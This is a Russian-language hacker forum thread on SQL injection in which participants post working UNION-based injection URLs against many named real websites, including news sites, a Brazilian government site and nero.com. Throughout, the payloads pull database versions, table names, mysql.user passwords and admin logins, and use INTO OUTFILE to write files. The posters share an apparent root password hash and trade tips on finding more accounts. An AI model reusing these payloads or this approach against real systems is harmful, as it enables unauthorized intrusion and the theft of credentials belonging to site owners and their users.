SQL Инъекции

Tut.by
Огроменный портал...

Очевидно, юзеры в другой БД, имя которой я пока не угадал =(

___________

Таблиц не подобрал.

 

Code:

http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(user,char(58),password)%20from%20mysql.user/* 

устал подберать количество столбцов . . .

 

Code:

http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+16,1/*
http://pricenews.kiev.ua/predpr.php3?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+information_schema.tables+limit+168,1/*

 

Зато мы подобрали. Ты немного переборщил. Вот как надо:

Code:

http://yard.ru/members/?remind&login=-9%27%20union%20select%20null,null,null,null,null,null,null,null,password,user,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20limit+0,1+INTO+OUTFILE+'test'/*

 

Code:

http://www.ipsnotizie.it/nota.php?idnews=-619+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*

 

Web studio... Блин, свой сайт до ума не доведут, но под заказ от 200 у.е. - пожалуйста...
К mysql.user доступ закрыт, но мож кто-то таблиц найдет каких =)

 

ты все перепутал запись в файл делается так
select+1,2,3,4,5,'тут данные которые будут записаны в файл'+from+mysql.user+into+outfile+'а тут папка куда записать'/*

 

www.radiobras.gov.br

Уже и бразилия =\

Code:

http://www.radiobras.gov.br/materia_i_2004.php?materia=-258494+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),10,11,12,13,14+from+mysql.user/*

кажись так :

root:6578c02369b5e3a9

 

Code:

http://personal.in.ua/article.php?ida=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*

Code:

http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,user(),3,4/*&cy=&cm=

 

Code:

http://www.vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(login,char(58),pwd),3,4+from+admins/*&cy=&cm=

а вот и админский акк /me пока ее ищет

 

Что - то мне подсказывает, что юзерорв тут ооочень много... Может потому что это 10-й по счету результат в гугле на запрос "Логин : "? =) Все дружно ищем таблицу с акками...

 

Code:

http://www.crenos.it/news/singnews.php?idnews=-28+union+select+1,password,2,3,4,5,6,7,8,9+from+mysql.user/*

universities(универ какой-то)

Code:

http://www.karat-telecom.ru/News/vnews/pnews.php?idnews=-113+union+select+

пипец приехали . . .

 

Официальный сайт игры "Самый умный"

16k юзеров, У админов открыты пароли.

 

Code:

http://www.ludolega.it/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6,7/*

 

Code:

http://wnro.kiev.ua/index.php?catns=kb&view=items_view&group=4&id=-2297+union+select+1/*

сил перебирать колонки не хватило, если кто переберет отпишитесь в ЛС, плз

 

2maxster

 

Мне сказать an-ky и KarLaed'e что на серваке завелся хацкер ?

 

скажи что у них там дырка, а хацкер устал

 

и нах спрашиваеться теперь морочиться с акк админа

 

Code:

http://www.carmedia.org/carmedia/accueil.php?idnews=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
http://www.nero.com/eng/showpress.php?id=-1187+union+select+1,2,3/*

тишина . . . . . .